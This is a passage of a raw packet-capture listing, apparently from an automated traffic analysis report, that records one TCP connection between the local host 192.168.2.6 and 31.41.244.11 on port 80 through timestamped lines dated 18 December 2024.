                                                                                                                                                                  Dec 18, 2024 11:09:12.264117002 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.264153957 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.264161110 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.264189005 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.266021967 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.266083002 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.266087055 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.266115904 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.267796993 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.267849922 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.267891884 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.267939091 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.269645929 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.269690990 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.269778013 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.269824028 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.271545887 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.271595001 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.271642923 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.271682024 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.273390055 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.273447990 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.273466110 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.273500919 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.275262117 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.275310040 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.275356054 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.275402069 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.277112007 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.277154922 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.277249098 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.277287006 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.279294014 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.279340982 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.279409885 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.279450893 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.280930996 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.280975103 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.280999899 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.281038046 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.282732964 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.282788038 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.282840967 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.282882929 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.284651995 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.284665108 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.284699917 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.286564112 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.286609888 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.286634922 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.286674976 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.297406912 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.297461987 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.297475100 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.297485113 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.297516108 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.297524929 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.297554970 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.297593117 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.297719955 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.297732115 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.297754049 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.297771931 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.297832966 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.297844887 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.297857046 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.297867060 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.297890902 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.298006058 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.298018932 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.298031092 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.298043013 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.298070908 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.299791098 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.299819946 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.299834967 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.299853086 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.303651094 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.303702116 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.303704023 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.303718090 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.303738117 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.303760052 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.303791046 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.303831100 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.305175066 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.305222034 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.305286884 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.305327892 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.307054043 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.307097912 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.307133913 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.307178974 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.308890104 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.308938980 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.309078932 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.309119940 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.310736895 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.310781956 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.310884953 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.310925961 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.312614918 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.312665939 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.404839993 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.404949903 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.405000925 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.405040979 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.405603886 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.405642986 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.405703068 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.405740976 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.407109976 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.407152891 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.407166004 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.407201052 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.408658028 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.408706903 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.408740997 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.408776999 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.410171032 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.410211086 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.410218954 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.410243988 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.411741972 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.411799908 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.411801100 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.411839008 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.413237095 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.413285971 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.413371086 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.413408041 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.414800882 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.414849043 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.414892912 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.414930105 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.416300058 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.416351080 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.416368008 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.416404009 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.417789936 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.417843103 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.417906046 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.417944908 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.419301987 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.419341087 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.419413090 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.419446945 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.420850039 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.420892000 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.420895100 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.420931101 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.422446012 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.422488928 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.422540903 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.422575951 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.423713923 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.423758984 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.423810959 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.423852921 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.425122976 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.425165892 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.425231934 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.425275087 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.426511049 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.426563978 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.426614046 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.426652908 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.427864075 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.427908897 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.427958012 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.427997112 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.429209948 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.429258108 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.429301023 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.429333925 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.430543900 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.430588961 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.430663109 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.430701971 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.431963921 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.432008028 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.432038069 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.432079077 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.433310032 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.433357000 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.433389902 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.433429956 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.434487104 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.434531927 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.434585094 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.434627056 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.435838938 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.435883999 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.435925961 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.435965061 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.437120914 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.437165022 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.437211990 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.437252998 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.438416958 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.438462019 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.438519001 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.438554049 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.439717054 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.439760923 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.439817905 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.439852953 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.441046000 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.441092968 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.441139936 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.441178083 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.442373991 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.442414999 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.442419052 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.442451954 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.443656921 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.443701982 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.443747997 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.443788052 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.444905996 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.444952965 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.445014954 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.445050955 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.446209908 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.446255922 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.446310997 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.446352959 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.447496891 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.447545052 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.447587967 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.447624922 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.448877096 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.448915958 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.448978901 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.449016094 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.450161934 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.450208902 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.450248957 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.450284958 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.451432943 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.451476097 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.451513052 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.451553106 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.452748060 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.452789068 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.452830076 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.452871084 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.454024076 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.454067945 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.454133034 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.454173088 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.455311060 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.455362082 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.455413103 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.455446005 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.456641912 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.456691980 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.456799984 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.456840038 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.457972050 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.458014965 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.458080053 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.458120108 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.459219933 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.459256887 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.459290981 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.459326029 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.460480928 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.460525990 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.460592031 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.460638046 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.461836100 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.461879015 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.462003946 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.462040901 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.463758945 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.463802099 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.463809967 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.463850021 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.464694977 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.464736938 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.464907885 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.464946985 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.465720892 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.465761900 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.465817928 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.465853930 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.467005968 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.467046022 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.467082977 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.467120886 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.468292952 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.468332052 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.468422890 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.468457937 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.469592094 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.469630957 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.469681978 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.469716072 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.471016884 CET804987731.41.244.11192.168.2.6
